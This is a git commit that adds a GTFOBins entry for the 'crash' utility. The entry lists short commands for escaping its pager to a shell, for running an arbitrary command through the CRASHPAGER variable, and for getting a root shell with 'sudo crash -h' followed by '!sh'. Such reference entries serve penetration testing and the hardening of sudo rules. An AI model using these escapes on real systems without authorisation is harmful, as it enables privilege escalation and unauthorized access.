Create crash.md

This commit is contained in:
bcoles 2020-03-15 23:10:31 +11:00 committed by GitHub
parent 2e6fa047e9
commit bbb7db7d63
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

17
_gtfobins/crash.md Normal file
View File

@ -0,0 +1,17 @@
---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
crash -h
!sh
command:
- code: |
COMMAND='/usr/bin/id'
CRASHPAGER="$COMMAND" crash -h
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo crash -h
!sh
---